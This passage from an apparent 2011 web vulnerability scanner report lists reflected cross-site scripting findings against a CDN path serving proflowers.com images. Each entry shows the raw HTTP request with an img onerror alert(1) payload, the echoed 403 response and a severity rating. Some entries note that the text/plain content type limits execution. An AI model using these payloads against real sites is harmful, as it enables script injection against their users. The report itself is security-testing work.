Unable to find /ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ5df3f<img src=a onerror=alert(1)>a18490b2d47

4.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b753f<img%20src%3da%20onerror%3dalert(1)>54a735179c was submitted in the REST URL parameter 9. This input was echoed as b753f<img src=a onerror=alert(1)>54a735179c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img%20src%3da%20onerror%3dalert(1)>54a735179c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQb753f<img src=a onerror=alert(1)>54a735179c

4.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3 was submitted in the REST URL parameter 9. This input was echoed as ae9c6<img src=a onerror=alert(1)>e50248b99e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img%20src%3da%20onerror%3dalert(1)>e50248b99e3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 113
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:12 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQae9c6<img src=a onerror=alert(1)>e50248b99e3

4.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea was submitted in REST URL parameter 9 and was echoed as 1f963<img src=a onerror=alert(1)>0abf99f1fea in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img%20src%3da%20onerror%3dalert(1)>0abf99f1fea?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 118
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:15 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ1f963<img src=a onerror=alert(1)>0abf99f1fea

4.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19 was submitted in REST URL parameter 9 and was echoed as 1bd76<img src=a onerror=alert(1)>d86e9b37c19 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img%20src%3da%20onerror%3dalert(1)>d86e9b37c19?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:31 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ1bd76<img src=a onerror=alert(1)>d86e9b37c19

4.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259 was submitted in REST URL parameter 9 and was echoed as 34c7a<img src=a onerror=alert(1)>c0a23b23259 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img%20src%3da%20onerror%3dalert(1)>c0a23b23259?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:05 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMCMFAV_CMFFavBx_GEN_10_SQ34c7a<img src=a onerror=alert(1)>c0a23b23259

4.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84 was submitted in REST URL parameter 9 and was echoed as 8ece4<img src=a onerror=alert(1)>c6f0ee0aa84 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img%20src%3da%20onerror%3dalert(1)>c6f0ee0aa84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 115
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:17 GMT
Connection: close

Unable to find /ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ8ece4<img src=a onerror=alert(1)>c6f0ee0aa84

4.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3 was submitted in REST URL parameter 9 and was echoed as 53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img%20src%3da%20onerror%3dalert(1)>cfb6f0bb3c3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:59 GMT
Connection: close

Unable to find /ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ53c0a<img src=a onerror=alert(1)>cfb6f0bb3c3

4.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839 was submitted in REST URL parameter 9 and was echoed as 73bd4<img src=a onerror=alert(1)>3471c81f839 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img%20src%3da%20onerror%3dalert(1)>3471c81f839?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 110
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/GAR8inwhitegarden_bskt10_PC1845_PF73bd4<img src=a onerror=alert(1)>3471c81f839

4.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028 was submitted in REST URL parameter 9 and was echoed as 34789<img src=a onerror=alert(1)>a33706b7028 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn34789<img%20src%3da%20onerror%3dalert(1)>a33706b7028?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/GingerVase_tn34789<img src=a onerror=alert(1)>a33706b7028

4.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3 was submitted in REST URL parameter 9 and was echoed as 55ab4<img src=a onerror=alert(1)>7e214382de3 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20assrt10_PF55ab4<img%20src%3da%20onerror%3dalert(1)>7e214382de3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:49 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20assrt10_PF55ab4<img src=a onerror=alert(1)>7e214382de3

4.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload a9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139 was submitted in REST URL parameter 9 and was echoed as a9baa<img src=a onerror=alert(1)>043817ff139 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/IRS20blue_gv11_PFa9baa<img%20src%3da%20onerror%3dalert(1)>043817ff139?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/IRS20blue_gv11_PFa9baa<img src=a onerror=alert(1)>043817ff139

4.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload b58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6 was submitted in REST URL parameter 9 and was echoed as b58f3<img src=a onerror=alert(1)>89a2ea4ec6 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img%20src%3da%20onerror%3dalert(1)>89a2ea4ec6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:08 GMT
Connection: close

Unable to find /ProvideCommerce/KiwiPineapleFOTMSav_mb58f3<img src=a onerror=alert(1)>89a2ea4ec6

4.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372 was submitted in REST URL parameter 9 and was echoed as 520ee<img src=a onerror=alert(1)>73aa06e9372 in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img%20src%3da%20onerror%3dalert(1)>73aa06e9372?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:23 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img src=a onerror=alert(1)>73aa06e9372

4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF

Issue detail

The value of REST URL parameter 9 (the image name, the last path segment) is reflected unencoded in the response body. The payload 6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be was submitted in REST URL parameter 9 and was echoed as 6d67c<img src=a onerror=alert(1)>ec1cb1d74be in the Unable to find error message.

The reflection proves that the server writes the requested asset name back without HTML-encoding it, and an img tag with an onerror handler executes script wherever the body is parsed as HTML. The response, however, is a 403 served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so a browser that honours the declared type renders the body as text and the handler never runs; the payload only fires in a client that MIME-sniffs the body as HTML. The High/Certain rating in the Summary is the scanner's and reflects the echo alone, not that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
